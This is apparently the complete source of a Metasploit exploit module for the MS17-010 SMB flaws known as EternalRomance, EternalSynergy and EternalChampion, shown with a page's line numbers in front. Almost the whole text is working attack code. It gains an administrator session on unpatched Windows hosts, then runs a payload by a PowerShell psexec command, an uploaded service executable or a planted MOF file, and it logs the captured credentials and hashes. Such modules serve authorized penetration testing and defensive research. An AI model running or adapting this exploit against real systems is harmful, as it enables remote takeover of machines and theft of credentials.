1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Windows XP systems that are not part of a domain default to treating all # network logons as if they were Guest. This prevents SMB relay attacks from # gaining administrative access to these systems. This setting can be found # under: # #Local Security Settings > # Local Policies > #Security Options > # Network Access: Sharing and security model for local accounts class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010 include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution', 'Description'=> %q{ This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe. }, 'Author' => [ 'sleepya',# zzz_exploit idea and offsets 'zerosum0x0', 'Shadow Brokers', 'Equation Group' ], 'License'=> MSF_LICENSE, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'thread' }, 'References' => [ [ 'AKA', 'ETERNALSYNERGY' ], [ 'AKA', 'ETERNALROMANCE' ], [ 'AKA', 'ETERNALCHAMPION' ], [ 'AKA', 'ETERNALBLUE'],# does not use any CVE from Blue, but Search should show this, it is preferred [ 'MSB', 'MS17-010' ], [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests [ 'CVE', '2017-0147'], # for EternalRomance reference [ 'URL', 'https://github.com/worawit/MS17-010' ], [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], ], 'Payload'=> { 'Space'=> 3072, 'DisableNops'=> true }, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets'=> [ [ 'Automatic', { } ], [ 'PowerShell', { } ], [ 'Native upload', { } ], [ 'MOF upload', { } ] ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Mar 14 2017' )) register_options( [ OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]) ]) register_advanced_options( [ OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]), OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]), OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']), OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil]) ]) end def exploit begin eternal_pwn(datastore['RHOST']) smb_pwn() rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e print_error("#{e.message}") rescue ::Errno::ECONNRESET, ::Rex::Proto::SMB::Exceptions::LoginError, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused=> e print_error("#{e.class}: #{e.message}") rescue => error print_error(error.class.to_s) print_error(error.message) print_error(error.backtrace.join("\n")) ensure eternal_cleanup() # restore session end end def smb_pwn() case target.name when 'Automatic' if powershell_installed? print_status('Selecting PowerShell target') powershell else print_status('Selecting native target') native_upload end when 'PowerShell' powershell when 'Native upload' native_upload when 'MOF upload' mof_upload end handler end # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to # be moved into a mixin def powershell_installed? share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}" case datastore['SHARE'].upcase when 'ADMIN$' path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe' when 'C$' path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' else path = datastore['PSH_PATH'] end simple.connect(share) vprint_status("Checking for #{path}") if smb_file_exist?(path) vprint_status('PowerShell found') psh = true else vprint_status('PowerShell not found') psh = false end simple.disconnect(share) psh end def powershell ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME'] command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") end # Execute the powershell command print_status("Executing the payload...") begin psexec(command) rescue StandardError => exec_command_error fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") end end def native_upload filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe" servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8) serviceencoder = datastore['SERVICE_STUB_ENCODER'] || '' # Upload the shellcode to a file print_status("Uploading payload...") smbshare = datastore['SHARE'] fileprefix = "" # if SHARE = Users/sasha/ or something like this if smbshare =~ /.[\\\/]/ subfolder = true smbshare = datastore['SHARE'].dup smbshare = smbshare.gsub(/^[\\\/]/,"") folder_list = smbshare.split(/[\\\/]/) smbshare = folder_list[0] fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1 simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct') else subfolder = false simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") fd = smb_open("\\#{filename}", 'rwct') end exe = '' opts = { :servicename => servicename, :serviceencoder => serviceencoder} begin exe = generate_payload_exe_service(opts) fd << exe ensure fd.close end if subfolder print_status("Created \\#{fileprefix}\\#{filename}...") else print_status("Created \\#{filename}...") end # Disconnect from the share simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}") # define the file location if datastore['SHARE'] == 'ADMIN$' file_location = "%SYSTEMROOT%\\#{filename}" elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/ file_location = datastore['SHARE'].slice(0,1) +":\\#{filename}" else file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}" end psexec(file_location, false) unless datastore['SERVICE_PERSIST'] print_status("Deleting \\#{filename}...") #This is not really useful but will prevent double \\ on the wire :) if datastore['SHARE'] =~ /.[\\\/]/ simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") begin simple.delete("\\#{fileprefix}\\#{filename}") rescue XCEPT::ErrorCode => e print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}") end else simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") begin simple.delete("\\#{filename}") rescue XCEPT::ErrorCode => e print_error("Delete of \\#{filename} failed: #{e.message}") end end end end def mof_upload share = "\\\\#{datastore['RHOST']}\\ADMIN$" filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe" # payload as exe print_status("Trying wbemexec...") print_status("Uploading Payload...") if datastore['SHARE'] != 'ADMIN$' print_error('Wbem will only work with ADMIN$ share') return end simple.connect(share) exe = generate_payload_exe fd = smb_open("\\system32\\#{filename}", 'rwct') fd << exe fd.close print_status("Created %SystemRoot%\\system32\\#{filename}") # mof to cause execution of above mofname = rand_text_alphanumeric(14) + ".MOF" mof = generate_mof(mofname, filename) print_status("Uploading MOF...") fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct') fd << mof fd.close print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}") # Disconnect from the ADMIN$ simple.disconnect(share) end def report_auth service_data = { address: ::Rex::Socket.getaddress(datastore['RHOST'],true), port: datastore['RPORT'], service_name: 'smb', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: self.fullname, private_data: datastore['SMBPass'], username: datastore['SMBUser'].downcase } if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP' credential_data.merge!({ realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN, realm_value: datastore['SMBDomain'] }) end if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/ credential_data.merge!({:private_type => :ntlm_hash}) else credential_data.merge!({:private_type => :password}) end credential_data.merge!(service_data) credential_core = create_credential(credential_data) login_data = { access_level: 'Admin', core: credential_core, last_attempted_at: DateTime.now, status: Metasploit::Model::Login::Status::SUCCESSFUL } login_data.merge!(service_data) create_credential_login(login_data) end end |